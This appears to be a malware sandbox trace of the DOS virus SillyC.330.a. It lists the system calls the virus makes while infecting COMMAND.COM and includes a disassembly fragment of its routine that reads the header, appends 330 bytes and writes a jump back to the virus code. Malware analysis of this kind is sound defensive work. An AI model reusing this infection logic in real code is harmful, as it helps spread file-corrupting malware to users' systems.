Sample viewer

vx.netlux.org/Virus.DOS.SillyC.330.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:55:20.114515841Z 47 PC: 12ac5 | Get disk transfer address
2018-12-17T22:55:20.116240172Z 26 PC: 12ad5 | Set disk transfer address
2018-12-17T22:55:20.118574195Z 25 PC: 12ae2 | Get default drive
2018-12-17T22:55:20.120172931Z 14 PC: 12aeb | Set default drive (Drive = 'C')
2018-12-17T22:55:20.122779772Z 78 PC: 12af7 | Find first file
2018-12-17T22:55:20.130390976Z 67 PC: 12b31 | Get or set file attributes
2018-12-17T22:55:20.136557679Z 67 PC: 12b3d | Get or set file attributes
2018-12-17T22:55:20.47901364Z 61 PC: 12b45 | Open file (Filename = 'COMMAND.COM')
2018-12-17T22:55:20.487953036Z 87 PC: 12b4c | Get or set file date and time
2018-12-17T22:55:20.490235296Z 44 PC: 12b58 | Get time 0x12b58: or dx, dx
0x12b5a: je 0x12b54
0x12b5c: mov word ptr [bp + 0x145], dx
0x12b60: mov ah, 0x3f
0x12b62: lea dx, word ptr [bp + 0x59]
0x12b65: mov cx, 3
0x12b68: int 0x21
0x12b6a: mov ax, 0x4202
0x12b6d: xor cx, cx
0x12b6f: xor dx, dx
0x12b71: int 0x21
0x12b73: sub ax, 3
0x12b76: mov word ptr [0xfb2d], ax
0x12b79: mov byte ptr [0xfb2c], 0xe9
0x12b7e: lea si, word ptr [bp - 3]
0x12b81: mov di, 0xfcbc
0x12b84: mov cx, 0x14a
0x12b87: rep movsb byte ptr es:[di], byte ptr [si]
0x12b89: mov si, 0xfcd4
0x12b8c: call 0x22aac
2018-12-17T22:55:20.493259217Z 63 PC: 12b6a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:20.496984711Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:55:20.499928694Z 64 PC: 12b99 | Write file or device (Write 330 bytes on handle 5)
2018-12-17T22:55:20.510795875Z 66 PC: 12ba2 | Move file pointer
2018-12-17T22:55:20.512968016Z 64 PC: 12bac | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:20.517293525Z 87 PC: 12bbf | Get or set file date and time
2018-12-17T22:55:20.519679008Z 62 PC: 12bc3 | Close file
2018-12-17T22:55:20.527923985Z 67 PC: 12bcf | Get or set file attributes
2018-12-17T22:55:20.539107625Z 26 PC: 12bdc | Set disk transfer address
2018-12-17T22:55:20.540809223Z 14 PC: 12be5 | Set default drive (Drive = 'A')
2018-12-17T22:55:20.542717885Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')